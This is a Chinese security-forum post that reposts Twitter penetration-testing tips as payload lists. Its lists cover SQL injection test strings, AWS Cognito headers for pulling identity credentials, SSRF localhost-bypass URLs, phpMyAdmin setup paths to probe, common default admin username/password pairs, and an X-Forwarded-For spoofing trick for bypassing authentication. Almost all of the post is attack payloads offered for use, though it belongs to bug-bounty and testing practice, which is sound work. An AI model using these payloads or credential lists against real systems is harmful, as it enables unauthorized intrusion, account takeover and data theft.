安全矩阵

 找回密码
 立即注册
搜索
查看: 2730|回复: 0

干货 | Twitter渗透技巧搬运工(一)

[复制链接]

252

主题

252

帖子

1309

积分

金牌会员

Rank: 6Rank: 6

积分
1309
发表于 2022-5-16 00:02:49 | 显示全部楼层 |阅读模式
原文链接:干货 | Twitter渗透技巧搬运工(一)
快速检测有无SQL注入
  1. ' OR 1=1--
  2. ' OR 1=0--
  3. %27%20or%201=1
  4. *(|(object=*))
  5. )%20or%20('x'='x
  6. %20or%201=1
  7. 1) or pg_sleep(__TIME__)--
  8. /**/or/**/1/**/=1
  9. ' or username like '%
  10. );waitfor delay '0:0:__TIME__'--
  11. or isNULL(1/0) /*
  12. x' or 1=1 or 'x'='y
复制代码
来源:https://twitter.com/_bughunter/s ... Aza5nbjxnUqIw5N9Wyw
AWS Cognito 配置错误
  1. X-AMZ-Target:AWSCognitoIdentityProviderService.ConfirmSignUp
  2. X-AMZ-Target:AWSCognitoIdentityProviderService.GetUser
  3. 获取凭证访问密钥 ID 和密钥 将标头更改为这样并观察响应
  4. X-AMZ-TARGET:AWSCognitoIdentityService.GetCredentialsForIdentity
复制代码

来源:
https://threadreaderapp.com/thread/1522086964262051841.html
SSRF Bypass技巧
  1. SSRF Bypasses

  2. http://0.0.0.0
  3. http://0
  4. http://0x7f000001
  5. http://2130706433
  6. http://0000::1
  7. http://0000::1:25
  8. http://0000::1:22
  9. http://0000::1:3128
  10. http://2130706433
  11. http://3232235521
  12. http://3232235777
  13. http://2852039166
  14. http://0o177.0.0.1
复制代码
来源:https://twitter.com/_bughunter/s ... Aza5nbjxnUqIw5N9Wyw
PHPMyadmin渗透技巧
  1. 当默认凭据在#phpmyadmin登录时不起作用时,我会尝试访问这些路径

  2. admin/phpMyAdmin/setup/index.php
  3. phpMyAdmin/main.php
  4. phpmyadmin/pma/
  5. Admin/setup/index.php
  6. phpmyadmin/admin/setup/index.php
  7. phpmyadmin/setup/
  8. phpmyadmin/setup/index.php
复制代码
来源:https://twitter.com/tamimhasan40 ... y2cTCgvIjmJ9JyE7-8Q
找到管理员登录口,可以尝试以下账号密码
  1. admin:admin
  2. admin:a
  3. admin:12346578
  4. test:test
  5. guest:guest
  6. anonymous:anonymous
  7. admin:password
  8. admin:
  9. root:toor
  10. root:passw0rd
  11. root:root
  12. guest:test
  13. $sub_name:password
  14. ADMIN:ADMIN
  15. Admin:Admin
  16. :
  17. a:a
复制代码
来源:https://twitter.com/_bughunter/s ... LegLknUcam2qSjbt2PA
漏洞挖掘小技巧-身份绕过小技巧,修改XFF头
  1. Authentication bypass....

  2. Using custom header (See attached screenshot):

  3. X-Forwarded-For: 127.0.0.1
复制代码

来源:https://twitter.com/BountyOverfl ... LegLknUcam2qSjbt2PA




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 06:56 , Processed in 0.015624 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表